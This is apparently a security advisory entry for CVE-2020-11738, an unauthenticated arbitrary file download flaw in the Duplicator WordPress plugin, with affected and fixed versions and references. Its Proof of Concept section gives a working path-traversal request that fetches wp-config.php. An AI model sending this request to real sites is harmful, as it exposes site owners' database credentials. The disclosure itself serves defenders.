WordPress Plugin Vulnerabilities

Duplicator 1.3.24 & 1.3.26 - Unauthenticated Arbitrary File Download

Description

The issue is being actively exploited, and allows attackers to download arbitrary files, such as the wp-config.php file.

According to the vendor, the vulnerability was only in two versions v1.3.24 and v1.3.26, the vulnerability wasn't present in versions 1.3.22 and before.

Proof of Concept

http://www.example.com/wp-admin/admin-ajax.php?action=duplicator_download&file=../wp-config.php

Affects Plugins

duplicator

Fixed in version 1.3.28

duplicator-pro

Fixed in version 3.8.7.1

References

CVE

CVE-2020-11738

URL

https://www.wordfence.com/blog/2020/02/active-attack-on-recently-patched-duplicator-plugin-vulnerability-affects-over-1-million-sites/

URL

https://snapcreek.com/duplicator/docs/changelog/?lite

URL

https://snapcreek.com/duplicator/docs/changelog/

URL

https://cxsecurity.com/issue/WLB-2021010001

ExploitDB

49288

Classification

Type

AUTHBYPASS

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CWE-287

Miscellaneous

Verified

WPVDB ID

35227c3a-e893-4c68-8cb6-ffe79115fb6d

Timeline

Publicly Published

2020-02-19 (about 2 years ago)

Added

2020-02-20 (about 2 years ago)

Last Updated

2021-01-04 (about 1 years ago)

Our Other Services

WPScan WordPress Security Plugin